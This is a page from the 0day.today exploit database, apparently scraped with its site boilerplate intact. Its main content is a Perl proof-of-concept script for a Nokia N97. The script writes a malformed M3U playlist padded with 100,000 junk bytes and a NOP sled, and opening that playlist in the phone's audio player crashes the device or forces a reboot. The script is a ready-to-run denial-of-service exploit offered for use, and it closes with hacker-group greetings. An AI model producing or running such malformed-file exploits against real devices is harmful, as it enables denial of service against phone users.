0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Nokia N97 (PlayList M3U) Crash PoC
#!/usr/bin/perl ### # Title : Nokia N97 (PlayList M3U) Crash PoC # Author : KedAns-Dz # E-mail : ked-h@hotmail.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Twitter page : twitter.com/kedans # platform : hardware # Impact : Crashs & Reboot (Some Times Rebooted ) # Tested on : Nokia N97 v 22.0.110 ( Type RM-505) # Target : N97 Mobile ### # Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all ) ### # Usage : Run the (Gestionn de Fichiers) And Open The (m3u) File with 'Lect.Audio' # ==> The (Gestionn de Fichiers) and ( Lect.Audio) is Blocked And Crashed !! ### # ------------ #START SYSTEM /root@MSdos/ : system("title KedAns-Dz"); system("color 1e"); system("cls"); print "\n\n"; print " |===========================================================|\n"; print " |= [!] Name : Nokia N97 (PlayList M3U) vApp 22.0.11 =|\n"; print " |= [!] Exploit : Local Crash PoC =|\n"; print " |= [!] Author : KedAns-Dz =|\n"; print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n"; print " |===========================================================|\n"; sleep(2); print "\n"; my $file = "n97.m3u"; my $Header = "#M3U\n"; # Header Format M3U my $ccq = "\x4d\x75\x73\x69\x63\x5c"; # Stock32Gb:\...\Music\ << you are can change this my $junk = "\x41" x 100000 ; # Junk my $nop = "\x90" x 55 ; # !| Nop |! x 55 open($FILE,">$file"); print $FILE $Header.$ccq.$junk.$nop ; # Evil File close($FILE) ; print "\n[!] Creating $file file...\n"; print "\n[+] File successfully created!\n"; #================[ Exploited By KedAns-Dz * HST-Dz * ]========================= # GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One # XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ; # > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers < # My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others # 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ... # sec4ever.com members Dz : =>> # Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others # hotturks.org : TeX * KadaVra ... all Others # Kelvin.Xgr ( kelvinx.net) #=========================================================================== # 0day.today [2024-11-16] #